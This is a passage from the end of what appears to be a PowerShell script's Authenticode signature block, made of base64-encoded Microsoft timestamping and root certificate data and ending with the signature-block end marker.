cnZpY2WgghF4MIIHJzCCBQ+gAwIBAgITMwAAAd1dVx2V1K2qGwABAAAB3TANBgkq # hkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEw # MTIxOTA3MDlaFw0yNTAxMTAxOTA3MDlaMIHSMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVy # YXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjg2REYtNEJC # Qy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNlMIIC # IjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqE4DlETqLnecdREfiWd8oun7 # 0m+Km5O1y1qKsLExRKs9LLkJYrYO2uJA/5PnYdds3aDsCS1DWlBltMMYXMrp3Te9 # hg2sI+4kr49Gw/YU9UOMFfLmastEXMgcctqIBqhsTm8Um6jFnRlZ0owKzxpyOEdS # Z9pj7v38JHu434Hj7GMmrC92lT+anSYCrd5qvIf4Aqa/qWStA3zOCtxsKAfCyq++ # pPqUQWpimLu4qfswBhtJ4t7Skx1q1XkRbo1Wdcxg5NEq4Y9/J8Ep1KG5qUujzyQb # upraZsDmXvv5fTokB6wySjJivj/0KAMWMdSlwdI4O6OUUEoyLXrzNF0t6t2lbRsF # f0QO7HbMEwxoQrw3LFrAIS4Crv77uS0UBuXeFQq27NgLUVRm5SXYGrpTXtLgIqyp # HeK0tP2o1xvakAniOsgN2WXlOCip5/mCm/5hy8EzzfhtcU3DK13e6MMPbg/0N3zF # 9Um+6aOwFBCQrlP+rLcetAny53WcdK+0VWLlJr+5sa5gSlLyAXoYNY3n8pu94WR2 # yhNUg+jymRaGM+zRDucDn64HFAHjOWMSMrPlZbsEDjCmYWbbh+EGZGNXg1un6fvx # yACO8NJ9OUDoNgFy/aTHUkfZ0iFpGdJ45d49PqEwXQiXn3wsy7SvDflWJRZwBCRQ # 1RPFGeoYXHPnD5m6wwMCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRuovW2jI9R2kXL # IdIMpaPQjiXD8TAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBfBgNV # HR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2Ny # bC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYI # KwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAy # MDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUFBwMI # MA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEALlTZsg0uBcgdZsxy # pW5/2ORRP8rzPIsG+7mHwmuphHbP95o7bKjU6hz1KHK/Ft70ZkO7uSRTPFLInUhm # SxlnDoUOrrJk1Pc8SMASdESlEEvxL6ZteD47hUtLQtKZvxchmIuxqpnR8MRy/cd4 # D7/L+oqcJBaReCGloQzAYxDNGSEbBwZ1evXMalDsdPG9+7nvEXFlfUyQqdYUQ0nq # 6t37i15SBePSeAg7H/+Xdcwrce3xPb7O8Yk0AX7n/moGTuevTv3MgJsVe/G2J003 # l6hd1b72sAiRL5QYPX0Bl0Gu23p1n450Cq4GIORhDmRV9QwpLfXIdA4aCYXG4I7N # OlYdqWuql0iWWzLwo2yPlT2w42JYB3082XIQcdtBkOaL38E2U5jJO3Rh6EtsOi+Z # lQ1rOTv0538D3XuaoJ1OqsTHAEZQ9sw/7+91hSpomym6kGdS2M5//voMCFXLx797 # rNH3w+SmWaWI7ZusvdDesPr5kJV2sYz1GbqFQMEGS9iH5iOYZ1xDkcHpZP1F5zz6 # oMeZuEuFfhl1pqt3n85d4tuDHZ/svhBBCPcqCqOoM5YidWE0TWBi1NYsd7jzzZ3+ # Tsu6LQrWDwRmsoPuZo6uwkso8qV6Bx4n0UKpjWwNQpSFFrQQdRb5mQouWiEqtLsX # CN2sg1aQ8GBtDOcKN0TabjtCNNswggdxMIIFWaADAgECAhMzAAAAFcXna54Cm0mZ # AAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0 # ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMyMjVa # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0BAQEF # AAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51yMo1 # V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY6GB9 # alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9cmmv # Haus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN7928 # jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDuaRr3t # pK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74kpEe # HT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2K26o # ElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5TI4C # vEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZki1ug # poMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9QBXps # xREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3PmriLq0C # AwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUCBBYE # FCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJlpxtT # NRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIBFjNo # dHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5o # dG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUAYgBD # AEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU1fZW # y4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2NybC5t # aWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIwMTAt # MDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0y # My5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/ypb+pc # FLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulmZzpT # Td2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM9W0j # VOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECWOKz3 # +SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4FOmR # sqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3UwxTSw # ethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPXfx5b # RAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVXVAmx # aQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGConsX # HRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU5nR0 # W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEGahC0 # HVUzWLOhcGbyoYIC1DCCAj0CAQEwggEAoYHYpIHVMIHSMQswCQYDVQQGEwJVUzET # MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV # TWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFu # ZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjg2 # REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2 # aWNloiMKAQEwBwYFKw4DAhoDFQA2I0cZZds1oM/GfKINsQ5yJKMWEKCBgzCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBBQUAAgUA # 6WHLeDAiGA8yMDI0MDEyOTE1MDAwOFoYDzIwMjQwMTMwMTUwMDA4WjB0MDoGCisG # AQQBhFkKBAExLDAqMAoCBQDpYct4AgEAMAcCAQACAhm7MAcCAQACAhHAMAoCBQDp # Yxz4AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMH # oSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEFBQADgYEASQ+gPqBAAkojV3jldy10 # Cp504jjhA0bklJskpbQpE73lPq2iUptleDxdko7IloNe4urPEJpLygTvxgnE/y+2 # phurQnhVqOsLM06Ru8wMiCDUebaXd2VcBdwHiOcAtZ7gr1ygRpCNXGdoE3BGJ5nr # KKqWS/5W+uasmSIAvESiTNYxggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzET # MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV # TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1T # dGFtcCBQQ0EgMjAxMAITMwAAAd1dVx2V1K2qGwABAAAB3TANBglghkgBZQMEAgEF # AKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEi # BCDEOA5Tx60KP5ptOy3eHKXO6fVhJYj7MmHSmHl01TphizCB+gYLKoZIhvcNAQkQ # Ai8xgeowgecwgeQwgb0EIGH/Di2aZaxPeJmce0fRWTftQI3TaVHFj5GI43rAMWNm # MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO # BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEm # MCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHdXVcd # ldStqhsAAQAAAd0wIgQgSLwLWT2SB7/e8PgNyTuiJZ/TwTGJP0liGx8dvdnz6/Mw # DQYJKoZIhvcNAQELBQAEggIAb+KmsC5AjTu4IfG/fexFuNiUkzoCZxQm0r+wuV4J # kDM7iUOuin7vQp2DO5hF1sIgMnBGLM57/kT8KkLNZgmcHMR/L/e5poijk3CrZn4H # EGAaBmwRJhnQ2vUiRQzEQkdvOqC8rGiNZz9iwdm9e145g+pNYgim/WfCSsF+qSNE # 3E66e0s/U85XNEvJmfoP4G2j7LzxRKdvbi1Ut5t37YcKzCbHBS65AbkA2BNRuTZx # oXkg4osmSfnH0GNc9K+ojdtW6O9vYewUnA5z3gmKvYDICsYhO1XEmknrwHjQcn1A # X6hwiD9oAwpR6CxL3dJBRnUvUOtZMrh/Olvrwnvg9XM7pX6OhDyveo/ebPSFyWfn # 9rSlywulIUDmffteav8SttiX88MFJ6P2jqTi354RGB7/HKJ16WwX755jb0XeI6f6 # HCzav63WtDHZFRXgTApA/7OAhidto1IOeyQvO+Vl4Rz4RTzls3LM98SWcajdK9oU # dp4QuEewYXVUdNV+2RhwAweZj2gjBU47NpIRjXBt9ztbFV5Fkk9uPRHXCyuCQRB9 # MaJuyChEUgjf3zk+8b0mHVjL02lIIev8YBNvo2KsU9QMgQi4Jjz1ajnIF7YRXaOu # rUd/p+J8IhBFxBaXv6/SF3ekSm5zqlAi8sbUuk7E6rReM9t7BC47JnKlMuYh4ZZE # mco= # SIG # End signature block